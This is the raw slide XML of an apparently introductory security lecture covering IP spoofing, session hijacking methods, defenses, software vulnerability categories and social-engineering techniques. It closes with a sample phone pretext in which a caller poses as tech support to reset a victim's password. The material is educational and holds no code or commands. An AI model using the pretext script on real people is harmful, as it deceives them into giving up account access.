            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is IP address spoofing?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Creation of Internet Protocol (IP) packets with a forged source IP address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is the purpose?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Concealing the identity of the sender</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Impersonating another computing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2476011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Hijacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is session hijacking?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Getting access to the session state of a particular user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Steals a valid session ID which is used to get into system and retrieve the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pic>
        <p:nvPicPr>
          <p:cNvPr id="1024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4267200"/>
            <a:ext cx="3148966" cy="2057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527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vs. Hijacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Spoofing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An attacker does not actively take another user offline to perform the attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>He mainly pretends to be another user or machine to gain access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4209748"/>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77000" y="36594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09887"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4419600" y="4419600"/>
            <a:ext cx="1828800" cy="99060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86300" y="5379805"/>
            <a:ext cx="2819400"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I am John and here are my credentials</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="272932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vs. Hijacking (2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hijacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An attacker takes over an existing session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>He relies on the legitimate user to make a connection and authenticate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00800" y="36848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07629"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2438400" y="4419600"/>
            <a:ext cx="3810000"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3200" y="3635514"/>
            <a:ext cx="3338513"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John logs on to the server with his credentials</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Arrow Connector 11"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4343400" y="4572000"/>
            <a:ext cx="17800" cy="60771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862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or Bug</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Is Software Security a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Feature</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most people consider software security as a necessary feature of a product</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Is Security Vulnerability a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Bug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the software "failed" and allowed a hacker to see personal info, most users would consider that a software bug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7000" y="4876800"/>
            <a:ext cx="2082800" cy="1562100"/>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298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vs. Hijacking (3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hijacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Subsequently, the attacker takes over the session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3200" y="381378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9000" y="3886200"/>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4953000" y="4668919"/>
            <a:ext cx="12775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51458" y="4689638"/>
            <a:ext cx="10489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2294929" y="4281714"/>
            <a:ext cx="762000" cy="838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812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Hijacking Methods</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session fixation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Setting a user's session id to a predefined one</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session sidejacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using packet sniffing to read network traffic between two parties and steal the session cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-site scripting	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Obtain a copy of the cookie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3229778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6" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2133600" y="4993409"/>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hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>DEMO</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FAF7C8"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:hlinkClick r:id="rId3"/>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1538288" y="1142911"/>
            <a:ext cx="6067425" cy="3705225"/>
          </a:xfrm>
          <a:prstGeom prst="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636460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Protecting Against Session Hijacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1219200"/>
            <a:ext cx="8686800" cy="5334000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use encryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use a secure protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Limit incoming connections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Minimize remote access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Educate the employees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1126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81800" y="4419600"/>
            <a:ext cx="1646101" cy="1897319"/>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112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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is social engineering?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The act of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>manipulating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>people</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> into performing actions or revealing confidential information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Instead of breaking in or using technical hacking techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Essentially – a fancier, more technical way of lying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7400" y="5029200"/>
            <a:ext cx="1905000"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91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Popular Social Engineering Methods</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"Dumpster Diving"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"Shoulder Surfing"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Malicious E-mail Attachments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Deception and Manipulation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"Phishing"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"Pharming"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reverse Social Engineering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PBX Disguise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pic>
        <p:nvPicPr>
          <p:cNvPr id="1229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65822" y="3409202"/>
            <a:ext cx="2584107" cy="288590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136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228600" y="990600"/>
            <a:ext cx="8686800" cy="5638800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Phishing is a way of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication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1" y="3621430"/>
            <a:ext cx="3810000" cy="29716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0269" y="3611803"/>
            <a:ext cx="3749149" cy="30047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4494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E-mail Attachments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9839" y="2133600"/>
            <a:ext cx="8019854" cy="3124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1894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Pharming</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pharming is a hacker's attack aiming to redirect a website's traffic to another, bogus website.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2590800"/>
            <a:ext cx="5905500" cy="39052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976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“Dumpster Diving”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"Dumpster Diving“, a.k.a. trashing or skipping, is the practice of sifting through commercial or residential trash to find items that have been discarded by their owners, but which may be useful to the dumpster diver</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53000" y="3695700"/>
            <a:ext cx="3657600" cy="2743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326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Categories</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerabilities typically fall into two categories</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Bugs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> at the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>implementation level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bugs tend to be easier for attackers to exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Flaws</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> at the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>design level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>hardest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> defect category to handle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Also the most </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>prevalent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>critical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86600" y="4876800"/>
            <a:ext cx="1409700" cy="1466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348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and Manipulation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Real story: Japan Earthquake scammers were spreading malicious links to “dramatic” videos of the disaster. So, you ended up clicking on a link that actually downloaded malware onto your PC or took you to a phishing site that asked for personal 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2100" y="4317880"/>
            <a:ext cx="2879436" cy="2349620"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 906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87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“Shoulder Surfing”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These are direct observation techniques, such as looking over someone's shoulder, to get information. Shoulder surfing is particularly effective in crowded places because it is relatively easy to observe someone as they:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>fill out a form</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>enter their PIN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>enter their password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>tell sensitive information over the phone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0800" y="3733800"/>
            <a:ext cx="2388384" cy="179338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476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PBX Disguise</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Public Business Exchange –  attacker manipulates company ID system to impersonate someone of authority</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pic>
        <p:nvPicPr>
          <p:cNvPr id="921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832" l="4200" r="90000">
                        <a14:foregroundMark x1="25600" y1="20198" x2="25600" y2="20198"/>
                        <a14:foregroundMark x1="20400" y1="6931" x2="20400" y2="6931"/>
                        <a14:foregroundMark x1="47600" y1="30693" x2="47600" y2="30693"/>
                        <a14:foregroundMark x1="38800" y1="45347" x2="38800" y2="45347"/>
                        <a14:foregroundMark x1="22400" y1="33267" x2="22400" y2="33267"/>
                        <a14:foregroundMark x1="34600" y1="32277" x2="34600" y2="32277"/>
                        <a14:foregroundMark x1="28600" y1="60198" x2="28600" y2="60198"/>
                        <a14:foregroundMark x1="75800" y1="33267" x2="75800" y2="33267"/>
                        <a14:foregroundMark x1="50000" y1="26733" x2="50000" y2="26733"/>
                        <a14:foregroundMark x1="37800" y1="23762" x2="37800" y2="23762"/>
                        <a14:foregroundMark x1="25400" y1="25743" x2="25400" y2="25743"/>
                        <a14:foregroundMark x1="47000" y1="40000" x2="47000" y2="40000"/>
                        <a14:foregroundMark x1="39800" y1="39802" x2="39800" y2="39802"/>
                        <a14:foregroundMark x1="13600" y1="30297" x2="13600" y2="30297"/>
                        <a14:foregroundMark x1="68400" y1="45941" x2="68400" y2="45941"/>
                        <a14:foregroundMark x1="53000" y1="46535" x2="53000" y2="46535"/>
                        <a14:foregroundMark x1="52600" y1="46535" x2="52600" y2="46535"/>
                        <a14:foregroundMark x1="56600" y1="33465" x2="56600" y2="33465"/>
                        <a14:foregroundMark x1="39200" y1="31287" x2="39200" y2="31287"/>
                        <a14:foregroundMark x1="20800" y1="26733" x2="20800" y2="26733"/>
                        <a14:foregroundMark x1="26000" y1="31683" x2="26000" y2="31683"/>
                        <a14:foregroundMark x1="32000" y1="30693" x2="32000" y2="30693"/>
                        <a14:foregroundMark x1="59200" y1="22772" x2="59200" y2="22772"/>
                        <a14:foregroundMark x1="32000" y1="24554" x2="32000" y2="24554"/>
                        <a14:foregroundMark x1="19200" y1="23762" x2="19200" y2="23762"/>
                        <a14:foregroundMark x1="17400" y1="33861" x2="17400" y2="33861"/>
                        <a14:foregroundMark x1="17400" y1="33861" x2="17400" y2="33861"/>
                        <a14:foregroundMark x1="17400" y1="30693" x2="17400" y2="30693"/>
                        <a14:foregroundMark x1="22400" y1="30891" x2="22400" y2="30891"/>
                        <a14:foregroundMark x1="19200" y1="39406" x2="19200" y2="39406"/>
                        <a14:foregroundMark x1="24400" y1="38020" x2="24400" y2="38020"/>
                        <a14:foregroundMark x1="15200" y1="36832" x2="15200" y2="36832"/>
                        <a14:foregroundMark x1="15800" y1="19208" x2="15800" y2="19208"/>
                        <a14:foregroundMark x1="53200" y1="50099" x2="53200" y2="50099"/>
                        <a14:foregroundMark x1="40400" y1="48911" x2="40400" y2="48911"/>
                        <a14:foregroundMark x1="45600" y1="46139" x2="45600" y2="46139"/>
                        <a14:foregroundMark x1="32200" y1="49109" x2="32200" y2="49109"/>
                        <a14:foregroundMark x1="61800" y1="45347" x2="61800" y2="45347"/>
                        <a14:foregroundMark x1="80800" y1="49703" x2="80800" y2="49703"/>
                        <a14:foregroundMark x1="70600" y1="36436" x2="70600" y2="36436"/>
                        <a14:foregroundMark x1="67400" y1="27327" x2="65000" y2="28317"/>
                        <a14:foregroundMark x1="59800" y1="32277" x2="59800" y2="32277"/>
                        <a14:foregroundMark x1="39400" y1="36436" x2="39400" y2="36436"/>
                        <a14:foregroundMark x1="42000" y1="32871" x2="42000" y2="32871"/>
                        <a14:foregroundMark x1="45600" y1="21782" x2="45600" y2="21782"/>
                        <a14:foregroundMark x1="32200" y1="20000" x2="32200" y2="20000"/>
                        <a14:foregroundMark x1="26000" y1="16040" x2="26000" y2="16040"/>
                        <a14:foregroundMark x1="30000" y1="44950" x2="30000" y2="44950"/>
                        <a14:foregroundMark x1="29600" y1="31881" x2="29600" y2="31881"/>
                        <a14:foregroundMark x1="30600" y1="37426" x2="30600" y2="37426"/>
                        <a14:foregroundMark x1="30600" y1="37426" x2="38800" y2="37426"/>
                        <a14:foregroundMark x1="53000" y1="38812" x2="54600" y2="38812"/>
                        <a14:foregroundMark x1="56200" y1="39406" x2="60400" y2="40792"/>
                        <a14:foregroundMark x1="61200" y1="40792" x2="61200" y2="40792"/>
                        <a14:foregroundMark x1="70000" y1="42376" x2="74200" y2="42376"/>
                        <a14:foregroundMark x1="57200" y1="45941" x2="57200" y2="45941"/>
                      </a14:backgroundRemoval>
                    </a14:imgEffect>
                  </a14:imgLayer>
                </a14:imgProps>
              </a:ext>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4800600" y="2675382"/>
            <a:ext cx="3924300" cy="396354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2819400"/>
            <a:ext cx="4495800" cy="4324261"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>“Hello? Who is this?  Tech support?  Oh, I’m sorry. I’m trying to reach Terry Simpson at extension 24667. Can you transfer me, please? I’m in a hurry.” … “Hi Terry, this is Jim from Tech Support. You can verify my identity from the caller-ID. Yes, I need to reset your password…” </a:t>
            </a:r>
          </a:p>
